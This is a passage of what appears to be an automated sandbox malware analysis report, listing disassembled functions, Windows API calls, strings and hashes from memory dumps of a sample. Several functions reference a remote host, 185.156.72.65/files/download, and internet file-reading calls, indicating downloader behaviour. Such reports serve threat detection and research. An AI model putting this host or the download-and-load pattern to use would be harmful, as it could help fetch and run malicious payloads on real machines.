                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                        • String ID:
                        • API String ID: 2565136772-0
                        • Opcode ID: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction ID: 673de6ed67965b3f6fbc6023462f0e4166f1d5e35f12aa292d970a48319607c6
                        • Opcode Fuzzy Hash: 4fb7e18995e5e2f02b724b68456555f771a33f70ab985dbad30083c91c8ea3bd
                        • Instruction Fuzzy Hash: 1601B571F40711ABE7305BB0BC0CF9B3AECAB49706B504035F905E2161DBB4C8078A69
                        Function 00413E0C Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                        • Instruction ID: 59a992c9e9a8f6180de132557df0e6155a9c37934bf91f888a5cd2673cffff64
                        • Opcode Fuzzy Hash: 1d05eccc710d275396565a7ca4ce4cb03c32f9e64a227524f8538adb25869953
                        • Instruction Fuzzy Hash: 11B14572900355AFDB118E25CC81BEFBFA5EF99310F144167E904AB382D3789982C7A9
                        Function 04944073 Relevance: 10.8, APIs: 7, Instructions: 329COMMON
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: _strrchr
                        • String ID:
                        • API String ID: 3213747228-0
                        • Opcode ID: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                        • Instruction ID: ccd5107143c2c6934b99a2b8ecf7bf1f06a3cf5aece5524f4521e8c908ad63e9
                        • Opcode Fuzzy Hash: f7094994ec903abcce49a6c1a655cc9da7e5ebab3a0cb20de3e6a5e810294d9f
                        • Instruction Fuzzy Hash: BDB16972A00366AFEB11CF64CC81FAE7BA9EFD9714F144275E804AF281D274B901C7A1
                        Function 00401600 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 162COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 00401605
                          • Part of subcall function 00409882: std::invalid_argument::invalid_argument.LIBCONCRT ref: 0040988E
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 0040163B
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 00401672
                        • Concurrency::cancel_current_task.LIBCPMT ref: 00401787
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                        • String ID: 185.156.72.65$string too long
                        • API String ID: 2123813255-2459586365
                        • Opcode ID: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                        • Instruction ID: 7f9c58fd2461fef3fc504d3e16d536ba0f8addf4ce568e9544afc24d4b31befa
                        • Opcode Fuzzy Hash: bdd389315b9d1b711b57ef1d46861381343838d65b71c4066379a5609bf0971b
                        • Instruction Fuzzy Hash: 2E4129B1A00300ABD7149F759C8179BB6F8EF04354F24063AF91AE73D1E7759D0487A9
                        Function 0040B800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 120COMMON
                        Download Yara Rule
                        APIs
                        • _ValidateLocalCookies.LIBCMT ref: 0040B837
                        • ___except_validate_context_record.LIBVCRUNTIME ref: 0040B83F
                        • _ValidateLocalCookies.LIBCMT ref: 0040B8C8
                        • __IsNonwritableInCurrentImage.LIBCMT ref: 0040B8F3
                        • _ValidateLocalCookies.LIBCMT ref: 0040B948
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                        • String ID: csm
                        • API String ID: 1170836740-1018135373
                        • Opcode ID: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction ID: 37170cc5a13740ac021db770265e436928f7f71c6dcd02e9963277d07105fea9
                        • Opcode Fuzzy Hash: 2a817a1480194b9b32cfb7907dea545d9bb946fea234306998335fac64bc32e7
                        • Instruction Fuzzy Hash: 5741A575A00218DBCF10DF69C884A9E7BB5EF44318F14817AE8147B3E2D7399905CBD9
                        Function 00413379 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • FreeLibrary.KERNEL32(00000000,?,00413488,004035B7,?,00000000,?,?,?,00413601,00000022,FlsSetValue,00422950,00422958,?), ref: 0041343A
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FreeLibrary
                        • String ID: api-ms-$ext-ms-
                        • API String ID: 3664257935-537541572
                        • Opcode ID: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction ID: afc4e2dc9a6310a4111bfadf7e5574d8da4adc5d781dab4b07345c405b9fe202
                        • Opcode Fuzzy Hash: b8c7e483e8ea991eea5b44eb111e182d5bd336103010429673e37ca0c8998616
                        • Instruction Fuzzy Hash: 5D210531B01211EBC732DF21EC44ADB7B68AB41765B254132ED05A7391E738EE46C6D8
                        Function 0040B9C4 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,0040B9BB,0040AF5F,0040A770), ref: 0040B9D2
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040B9E0
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040B9F9
                        • SetLastError.KERNEL32(00000000,0040B9BB,0040AF5F,0040A770), ref: 0040BA4B
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction ID: eb4c4ba290695b81d2d53517126189b774af9dd69cdf091561ca3954f11cb9c7
                        • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction Fuzzy Hash: 24019E323196119EE63427B9BCC6A6B3AA5EB05779720023BF120B51E3EF7D480256CC
                        Function 0493BC2B Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetLastError.KERNEL32(?,?,0493BC22,0493B1C6,0493A9D7), ref: 0493BC39
                        • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0493BC47
                        • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0493BC60
                        • SetLastError.KERNEL32(00000000,0493BC22,0493B1C6,0493A9D7), ref: 0493BCB2
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLastValue___vcrt_
                        • String ID:
                        • API String ID: 3852720340-0
                        • Opcode ID: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction ID: 6b615680d3c3bd4f4892dbedb3dbce5f38351b6913765855676d196fc37a38f7
                        • Opcode Fuzzy Hash: d6c575caaa9e79ca82c8f10f2e1bf5459d856a9b56868e1e7e4fca28ce884c4a
                        • Instruction Fuzzy Hash: 6C01D8333096119EB7352BFCBCC5E5B2B98EB83A7E3204239E524651F2EF5178015144
                        Function 04931867 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162COMMON
                        Download Yara Rule
                        APIs
                        • std::_Xinvalid_argument.LIBCPMT ref: 0493186C
                          • Part of subcall function 04939AE9: std::invalid_argument::invalid_argument.LIBCONCRT ref: 04939AF5
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,00000000,?,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049318A2
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,00181B20,00000000,?,185.156.72.65,?,?,?,185.156.72.65,185.156.72.65), ref: 049318D9
                        • Concurrency::cancel_current_task.LIBCPMT ref: 049319EE
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ByteCharMultiWide$Concurrency::cancel_current_taskXinvalid_argumentstd::_std::invalid_argument::invalid_argument
                        • String ID: 185.156.72.65
                        • API String ID: 2123813255-1765470537
                        • Opcode ID: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                        • Instruction ID: 16055c4a021d3d478baf4ec0dba0dd20e8421dbffe8fbf8f6eb6d0d18eeb0810
                        • Opcode Fuzzy Hash: 69ccd53acc2a7afa4ebe84e379714041f14f87e59b53a70bcc90546bd568d79b
                        • Instruction Fuzzy Hash: D141F9B1E00300ABE7149F749C86B5AB7F8EF4A316F100A39E95AD7290E771BD44C7A1
                        Function 004105C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,8F925C9F,?,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 004105F5
                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00410607
                        • FreeLibrary.KERNEL32(00000000,?,00000000,0041DAAB,000000FF,?,0041059C,?,?,00410570,00000016), ref: 00410629
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AddressFreeHandleLibraryModuleProc
                        • String ID: CorExitProcess$mscoree.dll
                        • API String ID: 4061214504-1276376045
                        • Opcode ID: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                        • Instruction ID: ae467a28d40358befcebc9227983d24377640bf1eed1e12363a062fa79a5df9f
                        • Opcode Fuzzy Hash: 4cd190c7c455c60d919dcec500e21cbf2ecb46ce251512cda49bfcc6e71cbce3
                        • Instruction Fuzzy Hash: E701D631A54625EFDB118F80DC05BEEBBB8FB48B10F004536F811A22A0DBB8AC44CB5C
                        Function 00415050 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
                        Download Yara Rule
                        APIs
                        • __alloca_probe_16.LIBCMT ref: 004150D5
                        • __alloca_probe_16.LIBCMT ref: 0041519E
                        • __freea.LIBCMT ref: 00415205
                          • Part of subcall function 00413CB9: RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                        • __freea.LIBCMT ref: 00415218
                        • __freea.LIBCMT ref: 00415225
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: __freea$__alloca_probe_16$AllocateHeap
                        • String ID:
                        • API String ID: 1423051803-0
                        • Opcode ID: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                        • Instruction ID: 0a96ed905c827a5c292ca8e68d33c0be9e05a90d5fda14ab984eef2cdbaa63a4
                        • Opcode Fuzzy Hash: c6d75d848bc7a9be22250e28ca9a699f36b8dee5fa0a29534bade35fe4989d48
                        • Instruction Fuzzy Hash: AA51C372600606EFDB215FA1EC81EFB77A9EFC5714B15046EFD04D6251EB39CC908AA8
                        Function 04932CB7 Relevance: 7.6, APIs: 5, Instructions: 113memorywindowCOMMON
                        Download Yara Rule
                        APIs
                        • VirtualProtect.KERNEL32(?,?,?,?), ref: 04932D5F
                        • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 04932D74
                        • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 04932D82
                        • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 04932D9D
                        • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 04932DBC
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocDebugErrorFormatLastLocalMessageOutputProtectStringVirtual
                        • String ID:
                        • API String ID: 2509773233-0
                        • Opcode ID: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                        • Instruction ID: 291d8e9c9a2de9b23263adf075e05c0508d6be20451c93dcc7016320b815ae20
                        • Opcode Fuzzy Hash: 135e4059f0a8e16b6c40cfe3354c74ba5c0e8907b24caca148f615c37fe0627b
                        • Instruction Fuzzy Hash: 6831F432B00104AFDB149F58DC40FAAB7A8EF49701F5541F9E905EB2A2DB71BD16CB94
                        Function 00401330 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00409CC5: EnterCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409CD0
                          • Part of subcall function 00409CC5: LeaveCriticalSection.KERNEL32(0042D064,?,?,?,0040104A,0042DBF4), ref: 00409D0D
                        • __Init_thread_footer.LIBCMT ref: 004013BB
                          • Part of subcall function 00409C7B: EnterCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409C85
                          • Part of subcall function 00409C7B: LeaveCriticalSection.KERNEL32(0042D064,?,?,00401089,0042DBF4,0041DCC0), ref: 00409CB8
                          • Part of subcall function 00409C7B: RtlWakeAllConditionVariable.NTDLL ref: 00409D2F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$ConditionInit_thread_footerVariableWake
                        • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                        • API String ID: 2296764815-3011832937
                        • Opcode ID: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                        • Instruction ID: cf4989964709d5cf6b10aa031a618c24b72f45a9210e311b945b03c0b8b43901
                        • Opcode Fuzzy Hash: 8afcb876ddc2999c1ba0bad2701e5863db79a9b1fdbf3493768d7342b1c45fce
                        • Instruction Fuzzy Hash: E5217170F002848AD730DF39E8467AAB7A0FB15304F90423AE8456B2B2DBB81981CB0D
                        Function 04931597 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 69COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 04939F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939F37
                          • Part of subcall function 04939F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F74
                        • __Init_thread_footer.LIBCMT ref: 04931622
                          • Part of subcall function 04939EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04939EEC
                          • Part of subcall function 04939EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04939F1F
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: CriticalSection$EnterLeave$Init_thread_footer
                        • String ID: 185.156.72.65/files/download$BAOJ$JAY@
                        • API String ID: 4132704954-3011832937
                        • Opcode ID: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                        • Instruction ID: aa2d1b6e0c986c3ca5647a3a311f188172e8752b98b06ac89f094f8ca670318c
                        • Opcode Fuzzy Hash: 6a6592139864edd19948d288d5ea32045136f2484dc71c592f5547b1ee2d657f
                        • Instruction Fuzzy Hash: A52177B0F003448BE730DF79EC067A9B3A0FB56308FA48279D8445B271DBB52986CB09
                        Function 0040CAD7 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx), ref: 0040CAE4
                        • GetLastError.KERNEL32(?,0040CA88,00000000,?,0042D0F8,?,?,?,0040CC2B,00000004,InitializeCriticalSectionEx,00420B18,InitializeCriticalSectionEx,00000000,?,0040C876), ref: 0040CAEE
                        • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0040CB16
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: LibraryLoad$ErrorLast
                        • String ID: api-ms-
                        • API String ID: 3177248105-2084034818
                        • Opcode ID: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                        • Instruction ID: 25d742bb915314b1e6f169ce4c8bc34e4efbfc99aed270fc8c56fe9432a01067
                        • Opcode Fuzzy Hash: 6ea35a358fe08483aaca9864d5c7ce1afea2c26e9c9286d7bdd8822d2b58ffa3
                        • Instruction Fuzzy Hash: 1BE0ED30740208F6DA201B61FD4AB5A3E69AB51B84F508131FD09A81E2E675A8159548
                        Function 004196CC Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetConsoleOutputCP.KERNEL32(8F925C9F,00000000,00000000,00000000), ref: 0041972F
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00419981
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 004199C7
                        • GetLastError.KERNEL32 ref: 00419A6A
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                        • Instruction ID: 69433146677377e8d20fe438975eb5a03bdcbd81a3ae5f82b6e9dde0de1db5be
                        • Opcode Fuzzy Hash: d5159c83dd231617a998158a8310f21f7752f689ca9b76bea25e341def0ffdac
                        • Instruction Fuzzy Hash: 55D18EB5E002489FCF15CFA8C8909EEBBB5FF49304F28416AE456EB351D634AD86CB54
                        Function 04949933 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • GetConsoleOutputCP.KERNEL32(0042C014,00000000,00000000,00000000), ref: 04949996
                          • Part of subcall function 049451FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04945462,?,00000000,-00000008), ref: 04945260
                        • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 04949BE8
                        • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 04949C2E
                        • GetLastError.KERNEL32 ref: 04949CD1
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                        • String ID:
                        • API String ID: 2112829910-0
                        • Opcode ID: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                        • Instruction ID: 617a67e78cc148dde137d8e82add0848fe4a6fdbd55459ce306b5621ec415725
                        • Opcode Fuzzy Hash: c5b85f2605b1a4877e753edebb94315cfcd19b1be6e7f59515690ef87a323643
                        • Instruction Fuzzy Hash: 7FD16CB5E002489FDB15CFE8D8809EEBBF9FF89314F18456AE45AEB351D630A941CB50
                        Function 04931BD7 Relevance: 6.3, APIs: 4, Instructions: 293networkfileCOMMON
                        Download Yara Rule
                        APIs
                        • InternetSetFilePointer.WININET(?,00000000,00000000,00000000,00000000), ref: 04931C6C
                        • InternetReadFile.WININET(?,00000000,000003E8,00000000), ref: 04931C8F
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: FileInternet$PointerRead
                        • String ID:
                        • API String ID: 3197321146-0
                        • Opcode ID: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                        • Instruction ID: a5a8c383a566e357223897e7fa66ea74bf5331801c2a528307aa7bbe19dea5d1
                        • Opcode Fuzzy Hash: 2d5a771e8380d636b867b6a84e5d92fd6be66219798d598553b184485cedc64d
                        • Instruction Fuzzy Hash: 77C15B709002189FEB24DF54CC85BE9B7B9EF4A305F1041E9E509A72A0DB75BE84CF95
                        Function 0040BAA4 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction ID: 427e8739ad2fdfd1bc337791267323dcfa727258f99cd262dc66f5b8a014dc51
                        • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction Fuzzy Hash: 8551BC72600206AFDB299F15C881B6AB7B4EF40314F14453FE80267AD9E739AC91DBDD
                        Function 0493BD0B Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: AdjustPointer
                        • String ID:
                        • API String ID: 1740715915-0
                        • Opcode ID: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction ID: b47c96d65a9c32922402c14284ab65e201839dd1ad4cbd5c89f8cfbab560cee2
                        • Opcode Fuzzy Hash: 01068ac1bdd0bc194ede9399adb2a85647f6cc07d9d95ab1ae95c0d7b664a8e0
                        • Instruction Fuzzy Hash: 3A51E572600606AFEB398F58D848BBA73B9EF42316F14453DDA554B292E731F950CB90
                        Function 004174E4 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00414F98: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,004151FB,?,00000000,-00000008), ref: 00414FF9
                        • GetLastError.KERNEL32 ref: 00417548
                        • __dosmaperr.LIBCMT ref: 0041754F
                        • GetLastError.KERNEL32(?,?,?,?), ref: 00417589
                        • __dosmaperr.LIBCMT ref: 00417590
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                        • String ID:
                        • API String ID: 1913693674-0
                        • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction ID: 13998406a9580c806f698d28beb46a1cfe6368519752a94925d3c074931ab18b
                        • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction Fuzzy Hash: 0921C871608205BFDB20AF62C840CABB7BAFF44368710853BF92997651D739ED818768
                        Function 0494774B Relevance: 6.1, APIs: 4, Instructions: 82COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 049451FF: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,04945462,?,00000000,-00000008), ref: 04945260
                        • GetLastError.KERNEL32 ref: 049477AF
                        • __dosmaperr.LIBCMT ref: 049477B6
                        • GetLastError.KERNEL32(?,?,?,?), ref: 049477F0
                        • __dosmaperr.LIBCMT ref: 049477F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.4515886279.0000000004930000.00000040.00001000.00020000.00000000.sdmp, Offset: 04930000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_4930000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                        • String ID:
                        • API String ID: 1913693674-0
                        • Opcode ID: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction ID: 3f42cc509b088d0e90a731a7a4ac126032c3f89d29f6cd4533dcb3a4a4075a4e
                        • Opcode Fuzzy Hash: fff5e27c2a9c5f498cd8e37e9d2e5b67da44c55886b9eb81921f36740ae9eac4
                        • Instruction Fuzzy Hash: 60219F71600209AFEB21AFA1C8D0C6BB7ADFFC52787118979E91997250E731FC50CBA0
                        Function 0041121B Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.4514119165.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction ID: 7177a7605b41648a86b30584ce86508c4f97125f369475c71d892394931dc7de
                        • Opcode Fuzzy Hash: daefbb992f6e98e82da9deec0440fc20cde4ea8490cf1120197b10a32be04fa6
                        • Instruction Fuzzy Hash: CF21CC31600205AFDF20AF62CC40DEB776DAF54368B10456FFA15E76A1D738DC818768
